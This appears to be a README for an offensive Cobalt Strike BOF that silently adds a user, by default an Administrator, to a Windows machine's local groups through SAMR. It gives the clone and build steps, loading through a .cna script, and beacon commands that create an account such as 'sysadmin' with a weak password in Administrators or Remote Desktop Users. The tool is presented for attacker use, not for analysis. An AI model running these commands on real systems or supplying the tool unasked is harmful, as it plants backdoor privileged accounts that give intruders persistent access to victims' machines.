Cobalt Strike BOF that Add a user to localgroup by samr.
git clone https://github.com/AgeloVito/adduserbysamr-bof.gitmakeAnd load adduserbysamr.cna
beacon> help adduserbysamr
Use: adduserbysamr [username] [password] [groupName]
e.g: adduserbysamr sysadmin p@ssw0rd
adduserbysamr sysadmin p@ssw0rd Administrators
adduserbysamr sysadmin p@ssw0rd "Remote Desktop Users"
Add a user to localgroup by samr, groupName is "Administrators" by default, do not use it at AD.
https://loong716.top/posts/MS_SAMR_Tips/
https://idiotc4t.com/redteam-research/netuseradd-ni-xiang
https://learn.microsoft.com/zh-cn/windows/win32/secmgmt/built-in-and-account-domains